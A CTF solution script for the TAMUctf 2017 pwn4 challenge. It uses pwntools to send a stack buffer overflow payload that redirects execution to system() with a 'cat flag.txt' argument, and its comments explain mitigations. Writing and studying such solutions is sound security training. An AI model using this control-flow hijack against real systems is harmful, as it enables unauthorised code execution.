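## Solution for TAMUctf 2017 : pwn200-pwn4
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
#
# CTF write-up script: sends one oversized line to the challenge service so
# that a saved return address is replaced with an address inside the binary.
# Vulnerability class: stack buffer overflow with control-flow hijack.
#
# Defensive reading: the payload relies on two hard-coded 32-bit addresses,
# which only works when the binary is mapped at a fixed base. Bounded input
# reads fix the root cause; a stack protector and a position-independent
# build with ASLR would each break this payload as written.

from pwn import *

r = remote('web.ctf.tamu.edu', 4324)

# Loaded from the local copy of the challenge binary; the object is not
# referenced again below (the addresses are hard-coded instead).
elf = ELF('./pwn4')

# Bytes literals throughout: p32() returns bytes, so str filler would raise
# TypeError on Python 3. On Python 2, b"..." is plain str, so behaviour there
# is unchanged.
payload = b"A" * 16  # filler; presumably the distance to the saved return address - confirm against the binary
payload += p32(0x80484d9)  # system (author's label)
# NOTE(review): the argument pointer follows immediately, with no fake return
# slot in between. That layout fits an address of a `call system` instruction
# rather than the function entry - confirm against the binary.
payload += p32(0x804a028)  # /bin/cat flag.txt (author's label: address of that string)
payload += b"AAAA"  # trailing filler word

r.sendline(payload)

# Hand the connection to the terminal so the service's reply can be read.
r.interactive()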